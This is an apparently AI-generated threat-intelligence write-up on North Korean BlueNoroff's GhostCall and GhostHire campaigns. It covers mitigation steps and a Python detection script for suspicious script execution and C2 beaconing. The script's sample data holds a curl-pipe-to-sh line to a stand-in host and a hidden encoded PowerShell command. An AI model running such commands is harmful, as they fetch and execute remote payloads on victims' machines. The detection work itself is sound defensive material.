
Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains

Severity: Medium
Tags: Malware, web
Published: Tue Oct 28 2025 (10/28/2025, 16:12:00 UTC)
Source: The Hacker News

Description

Threat actors tied to North Korea have been observed targeting the Web3 and blockchain sectors as part of twin campaigns tracked as GhostCall and GhostHire. According to Kaspersky, the campaigns are part of a broader operation called SnatchCrypto that has been underway since at least 2017. The activity is attributed to a Lazarus Group sub-cluster called BlueNoroff, which is also known as APT38,

AI-Powered Analysis

Last updated: 10/29/2025, 00:42:10 UTC

Technical Analysis

The GhostCall and GhostHire campaigns are part of a long-running operation named SnatchCrypto, conducted by the North Korean Lazarus Group sub-cluster BlueNoroff (also known as APT38 and other aliases). These campaigns focus on the Web3, blockchain, and venture capital sectors, targeting executives and developers primarily on macOS and Windows platforms.

GhostCall employs social engineering via Telegram to invite targets to fake investment meetings conducted through phishing websites mimicking Zoom or Microsoft Teams. Victims experience a simulated live call with real recordings of other victims, followed by prompts to update the Zoom or Teams SDK. This triggers the download of malicious AppleScript or PowerShell scripts that install a suite of malware including DownTroy, which bypasses macOS security controls to steal passwords and install additional payloads. These payloads include backdoors such as CosmicDoor, RooTroy, and RealTimeTroy, capable of executing commands, exfiltrating data, and wiping files destructively. SilentSiphon, another component, harvests credentials and secrets from a wide array of cloud services, developer tools, and communication platforms, including GitHub, AWS, Azure, Kubernetes, and blockchain-related services.

GhostHire targets Web3 developers by sending malicious coding assessments via Telegram bots, embedding malicious Go modules in GitHub repositories that trigger infection chains tailored to the victim's OS.

The campaigns have evolved from earlier efforts like RustBucket and leverage generative AI to accelerate malware development. The unified command-and-control infrastructure supports multi-OS payload delivery and persistent access. The campaigns have been observed since mid-2023 with infections confirmed in multiple countries, including European nations such as Italy, France, Spain, and Sweden. The threat actor's sophisticated multi-stage infection chains, credential theft, and data exfiltration capabilities pose a serious threat to targeted organizations.

Potential Impact

For European organizations, especially those involved in Web3, blockchain, venture capital, and technology sectors, these campaigns pose significant risks. The malware’s ability to steal credentials from password managers, cloud platforms, developer tools, and communication applications threatens confidentiality and intellectual property. Persistent backdoors enable long-term espionage, data exfiltration, and potential sabotage, impacting integrity and availability. The targeting of executives and developers increases the risk of supply chain compromises and insider threats. The use of social engineering and fake collaboration tools can lead to widespread infections within organizations. The campaigns’ multi-platform nature means both macOS and Windows environments are vulnerable, complicating defense efforts. The extensive data harvesting capabilities could lead to regulatory breaches under GDPR, resulting in legal and financial penalties. Additionally, the targeting of blockchain developers could undermine trust and security in emerging financial technologies critical to European digital economies.

Mitigation Recommendations

European organizations should implement targeted defenses beyond generic advice:

1) Conduct focused security awareness training emphasizing the risks of social engineering via Telegram and fake collaboration platform updates.
2) Deploy application allowlisting and restrict execution of unsigned or unexpected scripts, especially AppleScript and PowerShell, to prevent malicious payload execution.
3) Monitor network traffic for unusual beaconing to external command-and-control servers associated with known BlueNoroff infrastructure.
4) Enforce multi-factor authentication and credential vaulting to reduce credential theft impact.
5) Implement strict controls on software development environments, including scanning dependencies for malicious modules and restricting GitHub repository execution.
6) Use endpoint detection and response (EDR) solutions capable of detecting behavior associated with DownTroy, CosmicDoor, and related malware families.
7) Regularly audit and monitor cloud service credentials and API keys for unauthorized access or exfiltration.
8) Collaborate with threat intelligence providers to stay updated on evolving BlueNoroff tactics and indicators of compromise.
9) Limit administrative privileges and require user consent for system password prompts, scrutinizing unexpected requests from collaboration tools.
10) Conduct penetration testing simulating these attack vectors to identify and remediate gaps.
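Recommendations 2 and 3 above are the ones a detection engineer can turn into concrete logic: flag AppleScript or PowerShell interpreters that start from a messaging app or browser with hidden or encoded-command flags (the "update the Zoom/Teams SDK" lure runs exactly such a script), and flag hosts whose outbound connections to one external address recur on a near-fixed interval. The script below is an added example written for this page, not code from Kaspersky, The Hacker News, or the analysis author. The process events and network flows it runs on are constructed samples, the parent-process list and the beacon thresholds are assumptions to be tuned per environment, and the addresses come from the documentation ranges rather than any indicator tied to BlueNoroff.

```python
"""Two small detections matching the mitigation list above.

1. flag_script_execution: script interpreters (osascript, powershell, pwsh)
   launched from a lure-style parent (messaging app, browser) or with
   hidden / encoded-command arguments.
2. find_beacons: (src, dst) pairs whose inter-connection gaps are so regular
   that they look like scheduled check-ins rather than human browsing.

All sample data is constructed for illustration.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Interpreters singled out in recommendation 2.
SCRIPT_INTERPRETERS = {"osascript", "powershell.exe", "powershell", "pwsh.exe", "pwsh"}

# Assumption: parents from which a user would run a "collaboration SDK update"
# they were just sent. Tune to your fleet; a build server will differ.
LURE_PARENTS = {"Telegram", "Telegram.exe", "Safari", "Google Chrome",
                "chrome.exe", "msedge.exe", "firefox.exe"}

# Inline scripts, encoded commands, hidden windows and bypassed policy.
RISKY_ARGS = re.compile(
    r"(?:^|\s)(?:-e|-EncodedCommand|-enc|-ExecutionPolicy\s+Bypass"
    r"|-w(?:indowstyle)?\s+hidden)\b",
    re.IGNORECASE,
)


def flag_script_execution(events):
    """Return (host, interpreter, reasons) for each suspicious process event."""
    hits = []
    for ev in events:
        # Normalise Windows and POSIX paths to the bare executable name.
        name = ev["process"].replace("\\", "/").rsplit("/", 1)[-1].lower()
        if name not in SCRIPT_INTERPRETERS:
            continue
        reasons = []
        if ev.get("parent") in LURE_PARENTS:
            reasons.append(f"parent={ev['parent']}")
        if RISKY_ARGS.search(ev.get("cmdline", "")):
            reasons.append("risky-args")
        if reasons:
            hits.append((ev["host"], name, reasons))
    return hits


def _parse_ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def find_beacons(flows, min_connections=6, max_cv=0.15):
    """Flag (src, dst) pairs whose connection gaps have a low coefficient of
    variation (stdev / mean). Returns (pair, mean_gap_seconds, cv)."""
    by_pair = defaultdict(list)
    for flow in flows:
        by_pair[(flow["src"], flow["dst"])].append(_parse_ts(flow["ts"]))
    beacons = []
    for pair, times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean_gap
        if cv <= max_cv:
            beacons.append((pair, round(mean_gap, 1), round(cv, 3)))
    return beacons


# Constructed process events: one lure-style osascript, one benign osascript,
# one hidden encoded PowerShell from a messaging app, one scheduled script.
SAMPLE_PROCESS_EVENTS = [
    {"host": "mac-dev-01", "process": "/usr/bin/osascript", "parent": "Safari",
     "cmdline": "osascript -e 'do shell script \"curl -s http://sdk-update.example.invalid/run | sh\"'"},
    {"host": "mac-dev-01", "process": "/usr/bin/osascript", "parent": "Script Editor",
     "cmdline": "osascript /Users/dev/Documents/rename-files.scpt"},
    {"host": "win-exec-07",
     "process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "Telegram.exe",
     "cmdline": "powershell.exe -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"host": "win-exec-07",
     "process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "svchost.exe", "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"host": "win-exec-07", "process": "C:\\Windows\\System32\\cmd.exe",
     "parent": "explorer.exe", "cmdline": "cmd.exe /c dir"},
]


def constructed_flows():
    """Constructed flows: a 60 s check-in with small jitter, plus bursty browsing."""
    base = datetime(2025, 10, 28, 9, 0, tzinfo=timezone.utc)
    flows = []
    for i, jitter in enumerate([0, 1, -1, 2, 0, -2, 1, 0]):
        flows.append({"ts": (base + timedelta(seconds=60 * i + jitter)).isoformat(),
                      "src": "10.0.5.23", "dst": "203.0.113.10"})
    for offset in [0, 3, 4, 90, 600, 605, 2400, 2401]:
        flows.append({"ts": (base + timedelta(seconds=offset)).isoformat(),
                      "src": "10.0.5.23", "dst": "198.51.100.7"})
    return flows


if __name__ == "__main__":
    for hit in flag_script_execution(SAMPLE_PROCESS_EVENTS):
        print("script-exec", hit)
    for beacon in find_beacons(constructed_flows()):
        print("beacon", beacon)
```

The beacon check deliberately uses the coefficient of variation rather than a fixed interval, so it catches a 60 s, 5 min, or hourly schedule alike; raising `max_cv` trades false negatives against jittered beacons for more noise from legitimate pollers (software updaters, monitoring agents), which should be allowlisted by destination rather than by loosening the threshold.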


Technical Details

Article Source: https://thehackernews.com/2025/10/researchers-expose-ghostcall-and.html (fetched 2025-10-29T00:40:49Z, 2060 words)

Threat ID: 6901629430d110a1a6e799c6

Added to database: 10/29/2025, 12:40:52 AM

Last enriched: 10/29/2025, 12:42:10 AM

Last updated: 10/30/2025, 1:43:37 PM
